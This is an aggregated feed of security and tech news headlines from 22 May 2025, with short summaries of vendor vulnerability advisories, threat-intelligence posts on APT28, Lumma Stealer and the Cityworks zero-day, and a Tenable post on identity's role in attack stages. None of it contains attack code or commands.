Hazel observes that cybercriminals often fumble teamwork, with fragile alliances crumbling over missed messages. Plus, how UAT-6382 is exploiting Cityworks and what you can do to stay secure.

https://blog.talosintelligence.com/ghosted-by-a-cybercriminal/
Report calls for regulation of “legally and ethically flawed” VMware
2025-05-22T17:19:21Z | 1747934361

"Broadcom is unlikely to make any voluntary changes to its new commercial terms."

https://arstechnica.com/information-technology/2025/05/vmware-cloud-partners-demand-firm-regulatory-action-on-broadcom/
New Claude 4 AI model refactored code for 7 hours straight
2025-05-22T16:45:45Z | 1747932345

Anthropic says Claude 4 beats Gemini on coding benchmarks; works autonomously for hours.

https://arstechnica.com/ai/2025/05/anthropic-calls-new-claude-4-worlds-best-ai-coding-model/
Building Confidence in Cyber Essentials Compliance with Qualys Policy Audit
2025-05-22T16:13:21Z | 1747930401

In an era where cyberattacks are becoming more frequent, sophisticated, and damaging, organizations in the UK and around the world are under increasing pressure to adopt effective cybersecurity measures. Threats such as phishing, ransomware, data breaches, and supply chain compromises now target businesses of every size, often resulting in significant financial losses, legal implications, and […]

https://blog.qualys.com/category/product-tech
Authorities carry out global takedown of infostealer used by cybercriminals
2025-05-22T16:00:03Z | 1747929603

Authorities, along with tech companies including Microsoft and Cloudflare, say they’ve disrupted Lumma.

https://arstechnica.com/security/2025/05/authorities-carry-out-global-takedown-of-infostealer-used-by-cybercriminals/
Frontline Intel: Pinpointing GRU’s TTPs in the Recent Campaign
2025-05-22T15:37:14Z | 1747928234

Joint Cybersecurity Advisory (CSA) AA25-141A exposes a sustained and multifaceted cyber-espionage campaign attributed to Russia’s GRU Unit 26165, also known as APT28, Fancy Bear, Forest Blizzard, and a host of other monikers. Since early 2022, this group has relentlessly targeted Western logistics and technology companies involved in supporting Ukraine, exploiting both legacy and zero-day vulnerabilities [...] The post Frontline Intel: Pinpointing GRU’s TTPs in the Recent Campaign appeared first on Logpoint.

https://www.logpoint.com/en/blog/frontline-intel-pinpointing-grus-ttps-in-the-recent-campaign/
Frontline Intel: Pinpointing GRU’s TTPs in the Recent Campaign
2025-05-22T15:37:14Z | 1747928234

Joint Cybersecurity Advisory (CSA) AA25-141A exposes a sustained and multifaceted cyber-espionage campaign attributed to Russia’s GRU Unit 26165, also known as APT28, Fancy Bear, Forest Blizzard, and a host of other monikers. Since early 2022, this group has relentlessly targeted Western logistics and technology companies involved in supporting Ukraine, exploiting both legacy and zero-day vulnerabilities [...] The post Frontline Intel: Pinpointing GRU’s TTPs in the Recent Campaign appeared first on Logpoint.

https://www.logpoint.com/en/blog/frontline-intel-pinpointing-grus-ttps-in-the-recent-campaign/
UK and allies expose Russian intelligence campaign targeting western logistics and technology organisations
2025-05-22T15:23:34Z | 1747927414

Organisations urged to familiarise themselves with the threat and take immediate action to protect themselves.

https://www.ncsc.gov.uk/news/uk-partners-expose-russian-intelligence-campaign
Transform Today to be Resilient Tomorrow
2025-05-22T15:05:00Z | 1747926300

Cloud and AI technologies are delivering measurable results for global businesses.

https://news.sap.com/2025/05/sap-sapphire-transform-today-be-resilient-tomorrow/
Cisco Joins Stargate UAE Initiative
2025-05-22T15:00:00Z | 1747926000

Cisco announced the signing of a Memorandum of Understanding (MoU) to join the Stargate UAE consortium as a preferred technology partner. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-joins-stargate-uae-initiative.html
Cisco Joins Stargate UAE Initiative
2025-05-22T15:00:00Z | 1747926000

Cisco announced the signing of a Memorandum of Understanding (MoU) to join the Stargate UAE consortium as a preferred technology partner. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-joins-stargate-uae-initiative.html
Lumma Stealer: Down for the count
2025-05-22T14:53:19Z | 1747925599

The bustling cybercrime enterprise has been dealt a significant blow in a global operation that relied on the expertise of ESET and other technology companies

https://www.welivesecurity.com/en/videos/lumma-stealer-disruption/
Huawei Named a Leader in Managed Infrastructure Services for Telcos by GlobalData
2025-05-22T14:36:00Z | 1747924560

GlobalData, a research and analysis firm, released its 2025 Competitive Landscape Assessment report on Managed Infrastructure Services for Telcos. The report named Huawei as a Leader for its product solutions and global service capabilities.

//www.huawei.com/en/news/2025/5/globaldata-managed-services
How to Meet Cyber Insurance Requirements (and Avoid Denied Claims)
2025-05-22T14:34:00Z | 1747924440

As cyberattacks surge and premiums skyrocket, cyber insurance has shifted from a nice-to-have to a business-critical safeguard. But having a policy isn’t enough – to qualify for coverage, reduce costs, and ensure claims are paid, organizations must meet a growing list of cybersecurity requirements. The global cybersecurity insurance market is expected to reach $13.6B in 2025, with more than 80% of organizations already covered and 1 in 5 increasing their policy limits in the last…

https://zeronetworks.com/blog/how-to-meet-cyber-insurance-requirements
HPE security advisory (AV25-289)
2025-05-22T14:23:43Z | 1747923823

https://cyber.gc.ca/en/alerts-advisories/hpe-security-advisory-av25-289
Coaching Needed to Clear Network Operations Hurdles
2025-05-22T14:01:57Z | 1747922517

As part of a recent survey conducted by Mobile World Live, communications service providers (CSPs) were asked to weigh in on the state of artificial intelligence (AI) innovation and the challenges they face when deploying AI for IT operations (AIOps) in the network. Their responses, published in a 34-page report, offer...

https://www.netscout.com/blog/coaching-needed-clear-network-operations-hurdles
Next-Gen Firewall Redefined: Versa NGFW Takes the Lead
2025-05-22T13:52:53Z | 1747921973

Traditional firewalls can’t keep up with today’s rapidly evolving security threats. Versa Networks’ Next-Generation Firewall (NGFW) leverages its deep expertise and leadership in network security to protect today’s dynamic digital environments. The post Next-Gen Firewall Redefined: Versa NGFW Takes the Lead first appeared on The Versa Networks Blog.

https://versa-networks.com/blog/versa-networks-next-generation-firewall-redefining-digital-security/
Cloud hasn’t killed the agent: A real-time reality check
2025-05-22T13:45:00Z | 1747921500

When we first asked, “Will the cloud kill the agent?”, the security world was buzzing about agentless solutions. Three years... The post Cloud hasn’t killed the agent: A real-time reality check appeared first on Sysdig.

https://sysdig.com/blog/cloud-hasnt-killed-the-agent-a-realtime-reality-check/
Cloud hasn’t killed the agent: A real-time reality check
2025-05-22T13:45:00Z | 1747921500

When we first asked, “Will the cloud kill the agent?”, the security world was buzzing about agentless solutions. Three years... The post Cloud hasn’t killed the agent: A real-time reality check appeared first on Sysdig.

https://sysdig.com/blog/cloud-hasnt-killed-the-agent-a-realtime-reality-check/
Preemptive Cyber Intelligence with Indicators of Future Attack™
2025-05-22T13:29:25Z | 1747920565

This datasheet outlines how Silent Push provides preemptive cyber threat intelligence through our proprietary Indicators of Future Attack™ (IOFA™), enabling organizations to detect and stop malicious infrastructure before attacks occur. By leveraging IOFA™, TTP-led analysis, and real-time data enrichment, Silent Push empowers proactive threat hunting, brand protection, and early threat detection. Ready to dive deeper […] The post Preemptive Cyber Intelligence with Indicators of Future Attack™ appeared first on Silent Push.

https://www.silentpush.com/datasheets/preemptive-cyber-intelligence-with-indicators-of-future-attack/
Allvarliga sårbarheter i Cisco ISE och UIC
2025-05-22T13:28:00Z | 1747920480

Cisco publicerar säkerhetsuppdateringar för Cisco Identity Services Engine (ISE) och Cisco Unified Intelligence Center (UIC). Sårbarheterna har benämning CVE-2025-20152 och CVE-2025-20113, med en CVSS-klassning på 8.6 respektive 7.1. [1, 2].

https://www.cert.se/2025/05/allvarliga-sarbarheter-cisco-ise-och-uic.html
Revolutionizing Border Security with Cellular Positioning
2025-05-22T13:11:04Z | 1747919464

Preventing illicit trafficking is a daunting task for border security agencies. AI-powered Computer Vision and location intelligence enhance security, reduce costs, and close surveillance gaps. The post Revolutionizing Border Security with Cellular Positioning appeared first on SS8.

https://www.ss8.com/revolutionizing-border-security-with-cellular-positioning/
Caught in the CAPTCHA: How ClickFix is Weaponizing Verification Fatigue to Deliver RATs & Infostealers
2025-05-22T13:00:17Z | 1747918817

Learn about the latest ClickFix tactics compromising websites and embedding fraudulent CAPTCHA images to deliver malware and malicious code.

https://www.sentinelone.com/blog/how-clickfix-is-weaponizing-verification-fatigue-to-deliver-rats-infostealers/
How Identity Plays a Part in 5 Stages of a Cyber Attack
2025-05-22T13:00:00Z | 1747918800

While credential abuse is a primary initial access vector, identity compromise plays a key role in most stages of a cyber attack. Here’s what you need to know — and how Tenable can help.Identity compromise plays a pivotal role in how attackers move laterally through an organization. Credential abuse is the top initial access vector, implicated in 22% of breaches, according to the 2025 Verizon Data Breach Investigations Report, followed closely by vulnerability exploitation (20%). But identity compromise doesn’t stop after initial access. It plays a key role in five stages of a cyber attack.Understanding the following stages of an attack helps illuminate where identity becomes a threat vector:Initial accessReconnaissanceLateral movement and privilege escalationPersistence and detection evasionDeploymentBelow, we explore actions security teams can take to protect identities in each of these stages. While the guidance we share here is based on protecting on-premises Microsoft Active Directory environments, it’s worth considering how credential compromise can affect Microsoft Entra ID and hybrid identity infrastructure. We also discuss how Tenable Identity Exposure, available in the Tenable One Exposure Management Platform, can be used at each stage to provide security teams with valuable insights to help them proactively reduce their exposure to cyber attacks.Stage 1: Initial accessAttackers need a foothold and credential abuse enables them to get one. To prevent credentials from being abused by attackers, organizations need to proactively make sure their users have a strong password accompanied with two-factor (2FA) or multi-factor authentication (MFA). This is done by enforcing policies for password complexity, length, reuse and change frequency to which an organization’s users have to adhere. Even so, having full visibility into identities can be challenging for the security teams tasked with enforcing these policies.Tenable Identity Exposure provides the following indicators that security teams can use to gain visibility into areas where weaknesses may exist.Password Policy WeaknessCleartext Passwords in UseDetection of Password WeaknessesStage 2: ReconnaissanceOnce attackers have access to an environment they need to understand what it looks like and how they can exploit configurations and/or vulnerabilities to move onto the next step of lateral movement and privilege escalation. There are a number of legitimate security tools available that attackers can use to gain visibility into the environment. When these are used against an environment maliciously, they give away key secrets that can then be leveraged for movement across the environment.Tenable Identity Exposure provides indicators of attack to give security teams visibility into behavior that looks like these security tools are being run in your environment, which could be malicious if not expected. These indicators include:Massive Computer EnumerationAdministrative Account ScanningStage 3: Lateral movement and privilege escalationOnce they’ve completed their reconnaissance, attackers will try to use their findings to move between your environment objects to gain access to the privileged assets required to further their attack. How do they do this? Exploitation of relationships. To do so, they may try to access a system that is caching privileged user credentials, or they may try to reset the password on another identity in the environment. To protect against such activity you need to enforce policies restricting who is allowed to log onto certain system types, prevent password caching where possible and remove unnecessary relationships between objects. Tenable Identity Exposure provides indicators that can help security teams manage restrictions and spot inconsistencies, including:Administrative Logon RestrictionsDomain Controller Access InconsistenciesTenable is also able to provide graphical representations of relationships between identity objects in the attack paths.Stage 4: Persistence and evasionAnother key goal of lateral movement is for attackers to get themselves in a position where they can gain persistent access to the environment and avoid being detected. Given the complexity and requirements of identity solutions like Active Directory there are a number of backdooring techniques that can be utilized. One of the lesser-known of these is the exploitation of the AdminSDHolder container. Once an identity is added to this container, which is hidden by default in Active Directory, it will then periodically be granted access to highly privileged groups such as domain administrators. This access is granted through the SDProp process that, by default, is scheduled to run every 60 minutes. So even when the access is removed directly from the privileged groups, it is re-granted one hour later through the SDProp process when AdminSDHolder access is granted. Tenable Identity Exposure has the following indicator providing continuous visibility into AdminSDHolder membership:Ensure SDProp ConsistencyThere are a number of security tools on the market that can run point-in-time assessments to show weaknesses that need to be addressed; this data is often provided in a single report with no filterable history. Given the dynamic nature of identities, point-in-time assessments leave gaps in visibility for security teams. Attackers can take advantage of these gaps by making the changes in the environment to facilitate their activities and then undoing them before the next point-in-time assessment is performed, leaving security teams none the wiser. To be most effective, identity configuration monitoring should be continuous and have a filterable and referenceable record of all changes.Tenable Identity Exposure continually monitors Active Directory and the indicator below provides a trail flow for this very purpose:Trail FlowStage 5: DeploymentFinally, we have the deployment of the payload, such as malicious code, malware or ransomware. Chances are an attacker will need to run some sort of script or installer — such as PowerShell scripts — to achieve this. Putting a restriction in place through security policies to prevent these running can dramatically reduce risk.Tenable Identity Exposure provides the following indicator, specifically related to ransomware, to help security teams gain visibility into those places in the environment where the ability to run PowerShell scripts and access AppLocker could be restricted:.Insufficient Hardening Against RansomwareThe bigger pictureIn summary, we can see how identity is at the heart of each of these five stages of a cyber attack. While the above examples are focused around on-prem Active Directory, hybrid environments are also a target for attackers, such as the 2024 attack by Storm-0501. Tenable Identity Exposure, available in the Tenable One Exposure Management Platform, provides visibility into both Active Directory and Entra ID. Tenable Cloud Security also provides a comprehensive view into identity entitlement within public cloud providers and identity providers (IdPs), such as Ping Identity and Okta.Identity security is fundamental to a proactive exposure management program. To achieve effective exposure management, organizations need a comprehensive view of their entire attack surface. This means pulling together all available data from across their security tools, including those for identity, applications, cloud, operational technology (OT), endpoint, asset inventories, configuration management data bases (CMDBs), threat intelligence feeds and more. By combining insights from these diverse data sources, security teams can see the bigger picture, connecting the dots between assets, vulnerabilities, misconfigurations and existing compensating controls across multiple environments. The Tenable One Exposure Management Platform gives you a single, prioritized view of risk. By breaking down data silos and integrating insights from multiple security tools, organizations can reduce the likelihood of a breach and minimize risk exposure across the attack surface. Instead of viewing risks in isolation, security teams can connect the dots — understanding how attackers see their environment and taking smarter, more proactive action to reduce exposure.Learn more2024 Gartner® Prioritize IAM Hygiene for Robust Identity-First Security ReportFrom Managing Vulnerabilities to Managing Exposure: The Critical Shift You Can’t IgnoreA Unified Approach to Exposure Management: Introducing Tenable One Connectors and Customized Risk Dashboards

https://www.tenable.com/blog/how-identity-plays-a-part-in-5-stages-of-a-cyber-attack
You’ve Contained the Threat — What Comes Next? From Recovery to Lessons Learned
2025-05-22T13:00:00Z | 1747918800

Many organizations prioritize detection, analysis, and containment — but what comes after is where true resilience is built.Once a threat […]

https://www.guidepointsecurity.com/blog/youve-contained-the-threat-what-comes-next/
SAP BTP Innovations Deliver Powerful AI Capabilities to Developers and Business Users Across SAP Business Suite
2025-05-22T12:30:00Z | 1747917000

SAP BTP connects, extends, and automates business processes and applications, accelerates application development, and deploys AI capabilities that drive growth and innovation.

https://news.sap.com/2025/05/sap-btp-innovations-powerful-ai-capabilities-developers-business-users-sap-business-suite/
SAP Unveils AI-Powered Innovations for Network-Centric Supply Chain Management
2025-05-22T12:30:00Z | 1747917000

New innovations represent a fundamental shift in how businesses can approach their operations in an increasingly complex global landscape.

https://news.sap.com/2025/05/ai-powered-innovations-network-centric-supply-chain-management/
How a Clone of the Signal Application Compromised Official Users’ Data
2025-05-22T12:11:44Z | 1747915904

One of the biggest cyber scandals of the year directly involves the U.S. government. In early May, investigative media outlet 404 Media revealed that certain U.S. federal agencies, including U.S. Customs and Border Protection, were using a cloned and modified version of the Signal app.

https://blog.pradeo.com/how-a-clone-of-the-signal-application-compromised-official-users-data
Cisco welcomes Brett McGurk as Special Advisor for the Middle East and International Affairs
2025-05-22T12:00:00Z | 1747915200

Brett's combination of strategic insight and decades of global experience will help deepen our longstanding partnerships in the Middle East and globally.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-welcomes-brett-mcgurk-as-special-advisor-for-the-middle-east-and-international-affairs.html
Cisco To Participate in Bank of America Global Technology Conference
2025-05-22T12:00:00Z | 1747915200

Cisco (NASDAQ: CSCO) today announced that it will participate in the Bank of America Global Technology ConferenceMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-to-participate-in-bank-of-america-global-technology-conference.html
Cisco To Participate in Bank of America Global Technology Conference
2025-05-22T12:00:00Z | 1747915200

Cisco (NASDAQ: CSCO) today announced that it will participate in the Bank of America Global Technology ConferenceMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/cisco-to-participate-in-bank-of-america-global-technology-conference.html
AI Data Security
2025-05-22T12:00:00Z | 1747915200

AI Data Security

https://www.ic3.gov/CSA/2025/250522.pdf
New ETSI standard protects AI systems from evolving cyber threats
2025-05-22T11:45:11Z | 1747914311

The NCSC and DSIT work with ETSI to ‘set a benchmark for securing AI’.

https://www.ncsc.gov.uk/blog-post/new-etsi-standard-protects-ai-systems-from-evolving-cyber-threats
Wifi network attacks: The risk to businesses
2025-05-22T11:33:09Z | 1747913589

Addressing common issues such as misconfiguration and weak encryption can turn workers into victims

https://www.itpro.com/security/cyber-attacks/wifi-network-attacks-the-risk-to-businesses
Cato Networks Demonstrates AI-Based Policy Analysis and Enforcement at AWS Summit Tel Aviv 2025
2025-05-22T11:31:27Z | 1747913487

The Hidden Risk in Security Policies  Policy misconfigurations remain one of the most common and costly risks in network security. Studies in recent years have shown that the vast majority of firewall breaches stem from policy configuration errors, and human mistakes or skill gaps continue to be a leading cause of major security incidents. Traditionally,... The post Cato Networks Demonstrates AI-Based Policy Analysis and Enforcement at AWS Summit Tel Aviv 2025  appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-demonstrates-ai-based-policy-analysis-aws-summit-2025/
Forget Perfect Prevention ? Build Cyber Resilience Instead
2025-05-22T11:00:00Z | 1747911600

Discover why shifting from cyberattack prevention to cyber resilience is the key to survival in today?s relentless cyberthreat landscape.

https://www.akamai.com/blog/security/2025/may/forget-perfect-prevention-build-cyber-resilience-instead
The Impacket Arsenal: A Deep Dive into Impacket Remote Code Execution Tools
2025-05-22T10:09:21Z | 1747908561

In today's evolving threat landscape, we continually see new threat actors emerge and novel attack techniques surface. To keep pace, defenders must monitor the tactics, techniques, and procedures (TTPs) leveraged by these threat actors. A critical part of this understanding comes from analyzing the tools attackers use to achieve their objectives. Among the most widely [...] The post The Impacket Arsenal: A Deep Dive into Impacket Remote Code Execution Tools appeared first on Logpoint.

https://www.logpoint.com/en/blog/the-impacket-arsenal-a-deep-dive-into-impacket-remote-code-execution-tools/
The Impacket Arsenal: A Deep Dive into Impacket Remote Code Execution Tools
2025-05-22T10:09:21Z | 1747908561

In today's evolving threat landscape, we continually see new threat actors emerge and novel attack techniques surface. To keep pace, defenders must monitor the tactics, techniques, and procedures (TTPs) leveraged by these threat actors. A critical part of this understanding comes from analyzing the tools attackers use to achieve their objectives. Among the most widely [...] The post The Impacket Arsenal: A Deep Dive into Impacket Remote Code Execution Tools appeared first on Logpoint.

https://www.logpoint.com/en/blog/the-impacket-arsenal-a-deep-dive-into-impacket-remote-code-execution-tools/
UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware
2025-05-22T10:00:42Z | 1747908042

Talos has observed exploitation of CVE-2025-0994 in the wild by UAT-6382, a Chinese-speaking threat actor, who then deployed malware payloads via TetraLoader.

https://blog.talosintelligence.com/uat-6382-exploits-cityworks-vulnerability/
ViciousTrap – Infiltrate, Control, Lure: Turning edge devices into honeypots en masse.
2025-05-22T10:00:00Z | 1747908000

This blog post analyzes the Vicious Trap, a honeypot network deployed on compromised edge devices. La publication suivante ViciousTrap – Infiltrate, Control, Lure: Turning edge devices into honeypots en masse.  est un article de Sekoia.io Blog.

https://blog.sekoia.io/vicioustrap-infiltrate-control-lure-turning-edge-devices-into-honeypots-en-masse/
TeamCity Pipelines Pulse: Webhooks, Job-Level Parameters, And More
2025-05-22T09:58:41Z | 1747907921

Let your commits build faster with webhooks When you commit changes, you want your build to start as soon as you push code. Waiting for several minutes for a polling interval can be frustrating. That’s why we’re introducing webhooks, a simple way for your version control system to notify TeamCity as soon as new code […]

https://blog.jetbrains.com/teamcity/2025/05/teamcity-pipelines-pulse-webhooks/
DOJ charges 12 more in $263 million crypto fraud takedown where money was hidden in squishmallow stuffed animals
2025-05-22T08:29:42Z | 1747902582

Crypto fraud meets cuddly toys! US authorities have charged a group accused of stealing $263 million in cryptocurrency - and then laundering the cash by stuffing it into Squishmallows. Read more in my article on the Hot for Security blog.

https://www.bitdefender.com/en-us/blog/hotforsecurity/doj-charges-12-263-million-crypto-fraud-takedown-where-money-hidden-squishmallow-stuffed-animals
CVE-2025-47181 Microsoft Edge (Chromium-based) Update Elevation of Privilege Vulnerability
2025-05-22T07:00:00Z | 1747897200

Improper link resolution before file access ('link following') in Microsoft Edge (Chromium-based) allows an authorized attacker to elevate privileges locally.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47181
Cisco Unified Communications Products Privilege Escalation Vulnerability
2025-05-22T06:00:00Z | 1747893600

A vulnerability in multiple Cisco Unified Communications and Contact Center Solutions products could allow an authenticated, local attacker to elevate privileges to root on an affected device. This vulnerability is due to excessive permissions that have been assigned to system commands. An attacker could exploit this vulnerability by executing crafted commands on the underlying operating system. A successful exploit could allow the attacker to escape the restricted shell and gain root privileges on the underlying operating system of an affected device. To successfully exploit this vulnerability, an attacker would need administrative access to the ESXi hypervisor. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-kkhZbHR5 Security Impact Rating: Medium CVE: CVE-2025-20112

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-kkhZbHR5
Cisco Unified Intelligence Center Privilege Escalation Vulnerabilities
2025-05-22T06:00:00Z | 1747893600

Multiple vulnerabilities in Cisco Unified Intelligence Center could allow an authenticated, remote attacker to perform privilege escalation attacks on an affected system. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cuis-priv-esc-3Pk96SU4 Security Impact Rating: High CVE: CVE-2025-20113,CVE-2025-20114

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cuis-priv-esc-3Pk96SU4
Cisco Duo Self-Service Portal Command Injection Vulnerability
2025-05-22T06:00:00Z | 1747893600

A vulnerability in the self-service portal of Cisco Duo could allow an unauthenticated, remote attacker to inject arbitrary commands into emails that are sent by the service. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by injecting arbitrary commands into a portion of an email that is sent by the service. A successful exploit could allow the attacker to send emails that contain malicious content to unsuspecting users. Cisco Duo has addressed this vulnerability in the service, and no customer action is necessary to update on-premises software or devices. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-duo-ssp-cmd-inj-RCmYrNA Security Impact Rating: Medium CVE: CVE-2025-20258

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-duo-ssp-cmd-inj-RCmYrNA
Cisco Identity Services Engine RADIUS Denial of Service Vulnerability
2025-05-22T06:00:00Z | 1747893600

A vulnerability in the RADIUS message processing feature of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper handling of certain RADIUS requests. An attacker could exploit this vulnerability by sending a specific authentication request to a network access device (NAD) that uses Cisco ISE for authentication, authorization, and accounting (AAA). A successful exploit could allow the attacker to cause Cisco ISE to reload. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-restart-ss-uf986G2Q Security Impact Rating: High CVE: CVE-2025-20152

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-restart-ss-uf986G2Q
Cisco Identity Services Stored Cross-Site Scripting Vulnerability
2025-05-22T06:00:00Z | 1747893600

A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected system. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker must have valid administrative credentials. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-stored-xss-Yff54m73 Security Impact Rating: Medium CVE: CVE-2025-20267

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-stored-xss-Yff54m73
Cisco Secure Network Analytics Manager API Authorization Vulnerability
2025-05-22T06:00:00Z | 1747893600

A vulnerability in an API subsystem of Cisco Secure Network Analytics Manager and Cisco Secure Network Analytics Virtual Manager could allow an authenticated, remote attacker with low privileges to generate fraudulent findings that are used to generate alarms and alerts on an affected product. Thi vulnerability is due to insufficient authorization enforcement on a specific API. An attacker could exploit this vulnerability by authenticating as a low-privileged user and performing API calls with crafted input. A successful exploit could allow the attacker to obfuscate legitimate findings in analytics reports or create false indications with alarms and alerts on an affected device. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sna-apiacv-4B6X5ysw Security Impact Rating: Medium CVE: CVE-2025-20257

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sna-apiacv-4B6X5ysw
Cisco Secure Network Analytics Manager Privilege Escalation Vulnerability
2025-05-22T06:00:00Z | 1747893600

A vulnerability in the web-based management interface of Cisco Secure Network Analytics Manager and Cisco Secure Network Analytics Virtual Manager could allow an authenticated, remote attacker with valid administrative credentials to execute arbitrary commands as root on the underlying operating system. This vulnerability is due to insufficient input validation in specific fields of the web-based management interface. An attacker with valid administrative credentials could exploit this vulnerability by sending crafted input to an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with root privileges.  Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sna-ssti-dPuLqSmZ Security Impact Rating: Medium CVE: CVE-2025-20256

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sna-ssti-dPuLqSmZ
Cisco Webex Meetings Services HTTP Cache Poisoning Vulnerability
2025-05-22T06:00:00Z | 1747893600

A vulnerability in client join services of Cisco Webex Meetings could allow an unauthenticated, remote attacker to manipulate cached HTTP responses within the meeting join service. This vulnerability is due to improper handling of malicious HTTP requests to the affected service. An attacker could exploit this vulnerability by manipulating stored HTTP responses within the service, also known as HTTP cache poisoning. A successful exploit could allow the attacker to cause the Webex Meetings service to return incorrect HTTP responses to clients. Cisco has addressed this vulnerability in the service, and no customer action is necessary to update on-premises software or devices. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-cache-Q4xbkQBG Security Impact Rating: Medium CVE: CVE-2025-20255

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-cache-Q4xbkQBG
Cisco Webex Services Cross-Site Scripting Vulnerabilities
2025-05-22T06:00:00Z | 1747893600

Multiple vulnerabilities in Cisco Webex could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack. These vulnerabilities are due to improper filtering of user-supplied input. An attacker could exploit these vulnerabilities by persuading a user to follow a malicious link. A successful exploit could allow the attacker to conduct a cross-site scripting attack against the targeted user. Cisco has addressed these vulnerabilities in the service, and no customer action is necessary to update on-premises software or devices. There are no workarounds that address the vulnerabilities. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-xss-7teQtFn8 Security Impact Rating: Medium CVE: CVE-2025-20246,CVE-2025-20247,CVE-2025-20250

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-xss-7teQtFn8
Cisco Unified Contact Center Enterprise Cloud Connect Insufficient Access Control Vulnerability
2025-05-22T06:00:00Z | 1747893600

A vulnerability in the Cloud Connect component of Cisco Unified Contact Center Enterprise (CCE) could allow an unauthenticated, remote attacker to read and modify data on an affected device. This vulnerability is due to a lack of proper authentication controls. An attacker could exploit this vulnerability by sending crafted TCP data to a specific port on an affected device. A successful exploit could allow the attacker to read or modify data on the affected device. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-contcent-insuffacces-ArDOVhN8 Security Impact Rating: Medium CVE: CVE-2025-20242

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-contcent-insuffacces-ArDOVhN8
Muroran City Ensures File Security with OPSWAT MetaDefender Core™
2025-05-22T06:00:00Z | 1747893600

Scanning and Sanitizing Thousands of Files Daily to Meet Strict Government Regulations in Japan

https://www.opswat.com/blog/muroran-city-ensures-file-security-with-opswat-metadefender-core
ZDI-CAN-27212: Microsoft
2025-05-22T05:00:00Z | 1747890000

A CVSS score 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Peter Girnus (@gothburz) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-22, 15 days ago. The vendor is given until 2025-09-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-27211: Microsoft
2025-05-22T05:00:00Z | 1747890000

A CVSS score 8.8 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Peter Girnus (@gothburz) of Trend Zero Day Initiative' was reported to the affected vendor on: 2025-05-22, 15 days ago. The vendor is given until 2025-09-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

